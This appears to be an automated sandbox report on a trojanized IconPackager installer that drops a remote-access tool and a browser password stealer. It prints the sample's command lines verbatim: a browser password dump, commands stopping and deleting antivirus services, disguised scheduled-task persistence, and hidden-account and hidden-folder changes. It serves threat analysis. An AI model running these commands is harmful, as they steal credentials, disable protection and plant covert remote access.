Malware Analysis Report

2024-11-13 16:21

Sample ID 220520-dy81asffc3
Target 69516cc15d5538556121c418b0645c6ff58da43ffeaabba875d874520f07bd50
SHA256 69516cc15d5538556121c418b0645c6ff58da43ffeaabba875d874520f07bd50
Tags
rms aspackv2 discovery evasion persistence rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

69516cc15d5538556121c418b0645c6ff58da43ffeaabba875d874520f07bd50

Threat Level: Known bad

The file 69516cc15d5538556121c418b0645c6ff58da43ffeaabba875d874520f07bd50 was found to be: Known bad.

Malicious Activity Summary

rms aspackv2 discovery evasion persistence rat spyware stealer trojan upx

Modifies Windows Defender Real-time Protection settings

Windows security bypass

RMS

Nirsoft

ACProtect 1.3x - 1.4x DLL software

NirSoft WebBrowserPassView

Drops file in Drivers directory

Executes dropped EXE

Stops running service(s)

ASPack v2.12-2.42

Blocks application from running via registry modification

UPX packed file

Modifies Windows Firewall

Modifies file permissions

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Modifies WinLogon

Drops file in System32 directory

AutoIT Executable

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Runs .reg file with regedit

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of SetWindowsHookEx

Views/modifies file attributes

Delays execution with timeout.exe

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-05-20 03:26

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral6

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:38

Platform

win10v2004-20220414-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe"

Network

Country Destination Domain Proto
IE 52.109.76.32:443 tcp
FR 2.18.109.224:443 tcp
FR 2.18.109.224:443 storesdk.dsx.mp.microsoft.com tcp
NL 40.126.32.69:443 tcp
US 20.189.173.1:443 tcp
NL 178.79.208.1:80 tcp
US 104.18.25.243:80 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:38

Platform

win7-20220414-en

Max time kernel

152s

Max time network

163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

RMS

trojan rat rms

Windows security bypass

evasion trojan

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A

Modifies Windows Firewall

evasion

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Setup\update.exe N/A

Launches sc.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Windows\winit.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Windows\winit.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Windows\winit.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\Programdata\Microsoft\rootsystem\1.exe N/A
N/A N/A C:\Programdata\Microsoft\rootsystem\1.exe N/A
N/A N/A C:\Programdata\Microsoft\rootsystem\1.exe N/A
N/A N/A C:\Programdata\Microsoft\rootsystem\1.exe N/A
N/A N/A C:\Programdata\Microsoft\rootsystem\1.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\taskhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 380 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin
PID 380 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin
PID 380 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin
PID 380 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin
PID 380 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe
PID 380 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe
PID 380 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe
PID 380 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe
PID 1988 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 1988 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 1988 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 1988 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 1988 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 1988 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 1988 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 836 wrote to memory of 952 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 836 wrote to memory of 952 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 836 wrote to memory of 952 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 836 wrote to memory of 952 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 952 wrote to memory of 1816 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 952 wrote to memory of 1816 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 952 wrote to memory of 1816 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 952 wrote to memory of 1816 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 952 wrote to memory of 268 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 952 wrote to memory of 268 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 952 wrote to memory of 268 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 952 wrote to memory of 268 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 1816 wrote to memory of 1264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 1264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 1264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 1264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 1264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 1264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 1264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1264 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1264 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1264 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1264 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1264 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1264 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1264 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1264 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1264 wrote to memory of 1092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1264 wrote to memory of 1092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1264 wrote to memory of 1092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1264 wrote to memory of 1092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1264 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 1264 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 1264 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 1264 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 836 wrote to memory of 1536 N/A C:\ProgramData\Setup\update.exe C:\programdata\install\cheat.exe
PID 836 wrote to memory of 1536 N/A C:\ProgramData\Setup\update.exe C:\programdata\install\cheat.exe
PID 836 wrote to memory of 1536 N/A C:\ProgramData\Setup\update.exe C:\programdata\install\cheat.exe
PID 836 wrote to memory of 1536 N/A C:\ProgramData\Setup\update.exe C:\programdata\install\cheat.exe
PID 1264 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 1264 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 1264 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 1264 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 1536 wrote to memory of 1324 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1536 wrote to memory of 1324 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1536 wrote to memory of 1324 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1536 wrote to memory of 1324 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1264 wrote to memory of 924 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 1264 wrote to memory of 924 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe"

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin -ptoptorrent

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\programdata\microsoft\intel\P.exe

C:\programdata\microsoft\intel\P.exe

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Programdata\Microsoft\rootsystem\P.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Programdata\Microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext Log.txt

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Programdata\Microsoft\rootsystem\1.exe

C:\Programdata\Microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext Log.txt

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

